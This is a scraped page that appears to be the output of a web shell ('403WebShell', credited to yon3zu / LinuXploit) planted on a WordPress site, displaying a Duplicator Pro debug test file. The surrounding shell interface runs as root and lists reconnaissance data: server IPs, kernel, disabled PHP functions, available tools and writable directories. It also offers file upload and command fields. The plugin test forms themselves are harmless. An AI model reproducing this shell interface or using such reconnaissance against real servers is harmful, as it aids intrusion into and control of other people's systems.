Warning: chmod(): Operation not permitted in /www/wwwroot/jayronca.com/wp-content/plugins/duplicator-pro/duplicator-pro.php on line 8
403WebShell
403Webshell
Server IP : 172.67.188.169  /  Your IP : 104.23.197.149
Web Server : nginx/1.24.0
System : Linux seo3 5.15.0-179-generic #189-Ubuntu SMP Tue May 5 18:20:56 UTC 2026 x86_64
User : root ( 0)
PHP Version : 7.4.33
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /www/wwwroot/jayronca.com/wp-content/plugins/duplicator-pro/debug/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /www/wwwroot/jayronca.com/wp-content/plugins/duplicator-pro/debug/tst.packages.php
<?php defined("ABSPATH") or die(""); ?>
<div class="section-hdr">PACKAGE CTRLS</div>

<form>
	<?php
		$CTRL['Title']   = 'duplicator_pro_package_scan';
		$CTRL['Action']  = 'duplicator_pro_package_scan';
		$CTRL['Test']	 = false;
		DUP_PRO_DEBUG_TestSetup($CTRL);
	?>
	<div class="params">
		No Params
	</div>
</form>

<!-- METHOD TEST -->
<form>
	<?php
		$CTRL['Title']   = 'DUP_PRO_CTRL_Package_addQuickFilters';
		$CTRL['Action']  = 'DUP_PRO_CTRL_Package_addQuickFilters';
		$CTRL['Test']	 = true;
		DUP_PRO_DEBUG_TestSetup($CTRL);
	?>
	<div class="params">
		<textarea style="width:200px; height: 50px" name="dir_paths">D:/path1/;
D:/path2/path/;
		</textarea>
		<textarea style="width:200px; height: 50px" name="file_paths">D:/path1/test.txt;
D:/path2/path/test2.txt;
		</textarea>
	</div>
</form>

<!-- METHOD TEST -->
<form>
	<?php
		$CTRL['Title']   = 'DUP_PRO_CTRL_Package_switchDupArchiveNotice';
		$CTRL['Action']  = 'DUP_PRO_CTRL_Package_switchDupArchiveNotice';
		$CTRL['nonce']  = wp_create_nonce('DUP_PRO_CTRL_Package_switchDupArchiveNotice');
		$CTRL['Test']	 = true;
		DUP_PRO_DEBUG_TestSetup($CTRL);
	?>
	<div class="params">

		<label>Enable DupArchive:</label>
		<input type="text" name="enable_duparchive" value="true" /> <br/>
	</div>
</form>

<!-- METHOD TEST -->
<form>
	<?php
		$CTRL['Title']   = 'DUP_PRO_CTRL_Package_toggleGiftFeatureButton';
		$CTRL['Action']  = 'DUP_PRO_CTRL_Package_toggleGiftFeatureButton';
		$CTRL['nonce']   = wp_create_nonce('DUP_PRO_CTRL_Package_toggleGiftFeatureButton');
		$CTRL['Test']	 = true;
		DUP_PRO_DEBUG_TestSetup($CTRL);
	?>
	<div class="params">

		<label>Disable Gift Icon:</label>
		<input type="text" name="dupHidePackagesGiftFeatures" value="true" /> <br/>
	</div>
</form>

<!-- METHOD TEST -->
<form>
	<?php
		$CTRL['Title']   = 'DUP_PRO_CTRL_Package_getPackageFile';
		$CTRL['Action']  = 'DUP_PRO_CTRL_Package_getPackageFile';
		$CTRL['Test']	 = false;
		DUP_PRO_DEBUG_TestSetup($CTRL);
		$qryResult	= $wpdb->get_row("SELECT ID FROM `{$wpdb->base_prefix}duplicator_pro_packages` ORDER BY id DESC LIMIT 1", ARRAY_A);
		$last_id = (! empty($qryResult['ID'])) ? $qryResult['ID'] : 0;
		
	?>
	<div class="params">
		<!--  0=installer, 1=archive, 2=sql file, 3=log -->
		<label>Type:</label>
		<select name="which">
			<option value="0">installer</option>
			<option value="1">archive</option>
			<option value="2">sql file</option>
			<option value="3">log</option>
		</select><br/>
		<label>Package ID:</label>
		<input type="text" name="package_id" value="<?php echo esc_attr($last_id); ?>" style="width:100px" /> <i>last id</i><br/>
		<small>Note: only the log type will allow for the JSON response to be seen</small>
	</div>
</form>


Youez - 2016 - github.com/yon3zu
LinuXploit